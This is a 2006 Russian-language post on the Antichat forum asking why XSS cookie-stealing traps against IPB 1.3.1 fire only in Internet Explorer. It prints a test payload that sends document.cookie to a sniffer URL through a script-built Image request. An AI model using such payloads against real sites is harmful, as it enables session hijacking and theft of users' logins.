ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Xss в зависимости от браузера на примере Ipb
  #1  
Старый 16.12.2006, 19:41
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию Xss в зависимости от браузера на примере Ipb

Заметил что xss ловушки срабатывают только в ИЕ на примере IPB 1.3.1 final. Решил детально изучить в чем загвоздка.

1) Установил IPB локально
2) Установил локально сниффер

подопытные браузеры : MSIE 6.0, Opera 9.01, Firefox 2.0

Предистория - я не включаю рисунки в браузере, привычка сложилась с давних пор, когда сидел в lynx или когда было мало трафика и маленькая скорость.

Естественно, если рисунки отключены, то комбинации в ловушке типа ../sniffer/image.gif обламываются, и никаких куких с ссылкой на рисунок мы не получим.

Короче приступил к тестированию. Из 8 ловушек в ИЕ на ИПБ 1.3.1 сработало 6. В Фаере или Опере ничего не сработало.

Создал тестовую хтмл, с текстом
Код:
<script>alert(document.cookie);</script> 

<img src="http://localhost/s/s.gif">  

<script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>
Чтобы получить куки их Оперы или Фаера надо зайти на страничку форума (под логином) и потом только на эту хтмл. Только тогда в логах сниффера будет куки и другая нам нужная инфа. То есть надо еше одно насильное действие

Отсюда вытекает вопрос - как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IPB 2.1.7 passive XSS degeneration x Форумы 20 24.02.2007 00:02
Пассивиная Xss для браузера IE методом обхода граффического фильтра __XT__ Уязвимости 13 27.11.2006 03:04
XSS vbulletin and IPB v2.1.7 With IE liauliau Форумы 6 16.08.2006 15:19
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
XSS в форуме IPB, на примере браузера Опера Fr13nd Форумы 4 13.01.2005 19:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ